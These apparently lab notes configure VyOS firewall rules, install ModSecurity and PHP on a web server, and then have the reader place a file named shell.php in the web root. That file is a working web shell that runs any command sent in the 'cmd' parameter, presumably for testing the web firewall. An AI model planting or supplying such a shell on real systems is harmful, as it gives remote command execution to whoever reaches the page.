We need to add a new permanent rule to vyos such that established connections from the DMZ-to-WAN are allowed back through the WAN-to-DMZ firewall. If that rule (typically rule 1) is not there, add it.

 configure
 set firewall name WAN-to-DMZ rule 1 action accept
 set firewall name WAN-to-DMZ rule 1 state established enable
 commit
 save

• Set the rule number to 999 or similar

• Set the action to accept (this is wide open)

• Set the source ip address to be the web server

  configure set firewall name DMZ-to-WAN rule 999 action accept set firewall name DMZ-to-WAN rule 999 source address 172.16.50.3 commit save

on web01 run the following:

 sudo yum install mod_security mod_security_crs php php-common php-opcache php-cli php-gd php-curl php-mysqlnd -y
 sudo systemctl restart httpd

to show shows that the security2_module is loaded run the following:

 sudo httpd -M | Grep security2
 sudo cat /var/log/httpd/error_log | grep ModSecurity

Once the installation has worked, make sure to delete, disable or discard rule 999. Make sure to commit so that we are locked down once again.

on fw01 run:

 delete firewall name DMZ-to-WAN rule 999
 commit
 save

on Web01 in /var/www/html/ create a file called shell.php and add the following to the file

 <html>
 <body>
 <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
 <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
 <input type="SUBMIT" value="Execute">
 </form>
 <pre>
 <?php
     if(isset($_GET['cmd']))
     {
         system($_GET['cmd']);
     }
 ?>
 </pre>
 </body>
 </html>